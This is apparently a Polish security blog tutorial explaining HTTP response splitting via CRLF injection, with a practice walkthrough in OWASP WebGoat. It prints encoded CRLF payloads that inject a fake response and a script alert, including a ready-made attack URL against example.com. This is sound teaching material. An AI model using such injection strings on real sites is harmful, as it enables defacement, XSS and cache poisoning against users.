Blog: Cyberbezpieczenstwo

Czym jest atak z wykorzystaniem „HTTP response splitting”?

Czym jest atak z wykorzystaniem „HTTP response splitting”?
  • 342 views

Protokół HTTP używa sekwencji znaków CRLF do oznaczania, gdzie kończy się jeden nagłówek, a zaczyna następny, a także do wskazywania przejścia między nagłówkami a treścią strony.

Udostępnij!

Przykładowo – jeśli otworzymy w przeglądarce stronę http://www.goodshopping.com, nasz komputer wyśle do serwera www odpowiednio skonstruowane żądanie typu GET:

GET / HTTP/1.1

Host: www.goodshopping.com

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:59.0) Gecko/20100101
Firefox/59.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive

Upgrade-InsecureRequests: 1

 W odpowiedzi z serwera otrzymamy następujące dane – kod odpowiedzi, nagłówki i treść strony:

HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/10.0

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Sun, 08 Mar 2020 20:42:16 GMT

Content-Length: 13472

 

<!DOCTYPE html PUBLIC „-//W3C//DTD XHTML 1.0
Transitional//EN”
„http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>

 

<html xmlns=”http://www.w3.org/1999/xhtml”>

<head id=”Head1″><meta http-equiv=”Content-Type”
content=”text/html;charset=utf-8″
/><meta name=”description” content=”Good Shopping Web
Site” /><meta name=”author” content=”EC-Council”
/><meta name=”keywords” content=”Sopping,Online-Shopping,Good
Shopping” /><title>

                GoodShopping

</title>

Kiedy przyjrzymy się uważnie  całej komunikacji sieciowej (np. za pomocą oprogramowania Wireshark), przy transmisji HTTP na końcach linii dopatrzymy się znaków \r\n :

Te dwa znaki to tzw. Carriage Return (\r) oraz Line Feed (\n),  czyli wspomniane na początku CRLF.

W kodzie ASCII posiadają one numery 13 i 10 i są używane do oznaczenia końca linii (EOL – End Of Line).

Gdy znaki \r\n występują pojedynczo – oddzielają poszczególne nagłówki między sobą. Jeżeli jednak występują obok siebie (tzn. \r\n\r\n), wówczas mamy do czynienia z oddzieleniem nagłówków od treści HTML:

HTTP/1.1 200 OK\r\n

Cache-Control: private\r\n

Content-Type: text/html; charset=utf-8\r\n

Server: Microsoft-IIS/10.0\r\n

X-AspNet-Version: 4.0.30319\r\n

X-Powered-By: ASP.NET\r\n

Date: Sun, 08 Mar 2020 20:42:16 GMT\r\n

Content-Length:
13472
\r\n\r\n                      ß odseparowanie nagłówków i treści HTMLowej

<!DOCTYPE html PUBLIC „-//W3C//DTD XHTML 1.0
Transitional//EN”
„http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>


Oprócz kodu statusu odpowiedzi, w nagłówkach protokołu HTTP mogą być przesyłane takie parametry jak URI (Uniform Resource Identifier), ciasteczka (tzw. cookies), informacje o serwerze, o tym jakie formaty są obsługiwane w danej komunikacji etc.

 

Atak z wykorzystaniem „HTTP response splitting”.

Kiedy intruz manipuluje nagłówkami w komunikacji HTTP tak by dla pojedynczego żądania rozdzielić odpowiedź na dwie, mamy do czynienia z sytuacją zwaną „HTTP response splitting”.

Pamiętajmy, że protokół HTTP jest bezstanowy – oznacza to, że ani serwer webowy ani przeglądarka nie zauważą w takim nietypowym zachowaniu żadnego problemu.

Samo „HTTP response splitting” w zasadzie nie jest atakiem, ale raczej pewną podatnością, która umożliwia przeprowadzenie kilku rodzajów ataków:

– Cross Site Scripting (XSS)

– Cross User Defacement

– Web Cache Poisoning

– Page Hijacking

– Browser Cache Poisoning

Browser Hijacking

Wstawiając podwójną sekwencję znaków CRLF, napastnik może przedwcześnie zakończyć sekcję nagłówków i wstrzyknąć w źródło strony dodatkową zawartość przed rzeczywistą treścią witryny – np.:

HTTP/1.1 200 OK\r\n

Cache-Control: private\r\n

Content-Type: text/html; charset=utf-8\r\n\r\n    ß podwójny
CRLF

 

<html><h1> Strona zhackowana !!! </h1></html>\r\n

Server: Microsoft-IIS/10.0\r\n

X-AspNet-Version: 4.0.30319\r\n

X-Powered-By: ASP.NET\r\n

Date: Sun, 08 Mar 2020 20:42:16 GMT\r\n

Oczywiście zamiast treści <html><h1> Strona zhackowana !!! </h1></html> moglibyśmy wstawić np.: <script>alert(‘Strona zhackowana’)</script>. Wówczas otrzymamy wariant z Cross Site Scripting (XSS).

Aby użyć CRLF w żądaniu URL, musimy zastosować odpowiednie kodowanie, a mianowicie znak

CR = %0d. Z kolei znak LF = %0a, czyli podwójny CRLF (nasz \r\n\r\n) w adresie URL będzie kodowany następująco – %0d%0a%0d%0a.

A zatem przykładowy atak URL może wyglądać tak:

http://www.example.com/somepage.php?page=HTTP%2F1.1+200+OK%0d%0aCache-Control%3A+private%0d%0aContent Type%3A+text%2Fhtml%3B+charset%3Dutf-8%0d%0a%0d%0a%3Cscript%3Ealert%28%E2%80%98Strona+zhackowana%E2%80%99%29%3C%2Fscript%3E

Należy tutaj jednak zaznaczyć, że w przypadku systemów UNIX, LINUX i MacOS separatorem linii jest sam znak LF (%0a) – w takim przypadku atak byłby konstruowany przy pomocy podwójnego LF; w URLu do odseparowania nagłówków i wstrzykiwanego kodu użylibyśmy zatem ciągu %0a%0a.

Ciekawskim polecam stronę https://www.sttmedia.com/newline  – możecie tu zerknąć również na inne systemy operacyjne i separatory nowej linii.

Aby przetestować (przećwiczyć) ataki przy użyciu HTTP response splitting, możemy np. skorzystać z przygotowanej przez OWASP maszyny wirtualnej z już zainstalowanymi, podatnymi aplikacjami webowymi. Opis projektu znajduje się tutaj: https://owasp.org/www-project-broken-web-applications/migrated_content, a obraz maszyny  (w formacie VMware) możemy pobrać z: https://sourceforge.net/projects/owaspbwa/files/1.2/

Po zaimportowaniu i uruchomieniu maszyny możemy wejść na stronę powitalną z dowolnej przeglądarki i wybrać opcję OWASP WebGoat:

Użytkownik i hasło to guest / guest.

Po zalogowaniu wybieramy sekcję General à HTTP Splitting gdzie będziemy mogli dokonać ataku:

Teraz należy przygotować odpowiednie żądanie i
przekonwertować je do właściwego formatu.
 

Przykładowa treść żądania mogłaby wyglądać następująco:

pl

Content-Length: 0

HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 25

<html><h1> Strona zhackowana !!! </h1></html>

Dodanie fałszywego nagłówka odpowiedzi Content-Length: 0  spowoduje, że przeglądarka wstrzyma przetwarzanie pierwszej odpowiedzi serwera i przejdzie do kolejnej (początkowe zadanie – Search by country: pl nie zostanie wykonane). Wstawiony nagłówek HTTP/1.1 200 OK rozpoczyna nową odpowiedź. Content-Length: 25 ograniczy przeglądarkę do przetworzenia tylko 25 następnych bajtów.

Do konwersji formatu wiadomości możemy użyć narzędzia: https://cybersecurity.wtf/encoder/, które zakoduje nasz złośliwy URL:

Otrzymamy wynik: 

pl%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2025%0A%0A%3Chtml%3E%3Ch1%3E%20Strona%20zhackowana%20!!!%20%3C%2Fh1%3E%3C%2Fhtml%3E

 

który będziemy mogli wpisać w żądaniu wysyłanym do WebGoat:

Teraz wystarczy kliknąć przycisk Search i przeglądarka wykona nasz kod:

Miłego hackowania 😉